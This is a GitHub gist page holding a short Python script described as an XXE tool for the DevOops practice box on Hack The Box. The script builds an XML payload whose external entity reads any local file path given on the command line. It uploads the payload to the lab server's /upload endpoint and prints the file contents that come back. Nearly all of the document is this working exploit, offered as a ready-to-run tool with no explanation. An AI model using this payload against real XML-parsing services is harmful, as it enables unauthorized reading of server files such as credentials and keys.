Skip to content

Instantly share code, notes, and snippets.

@Ge0rg3
Created October 13, 2018 19:51
Show Gist options
  • Save Ge0rg3/f3ef5272256f482b48fa69c5ccbac8ee to your computer and use it in GitHub Desktop.
Save Ge0rg3/f3ef5272256f482b48fa69c5ccbac8ee to your computer and use it in GitHub Desktop.
An XXE tool written for the DevOops box on HTB.
import requests as rq
import sys
filename = sys.argv[1]
url = "http://10.10.10.91:5000/upload"
data = """<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file://FD" >]>
<Container>
<Author></Author>
<Subject></Subject>
<Content>
&xxe;
</Content>
</Container>
""".replace("FD",filename)
with open('payload.xml','w') as f:
f.write(data)
files = {'file':open('payload.xml','rb')}
print("Attempting with file " + filename +" on url "+url+"\n#########")
try:
r = rq.post(url, files=files)
except:
print("No file found!")
sys.exit()
for count, i in enumerate(r.text.split('\n')[4:-4]):
if count == 0: print(i.lstrip())
else: print(i)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment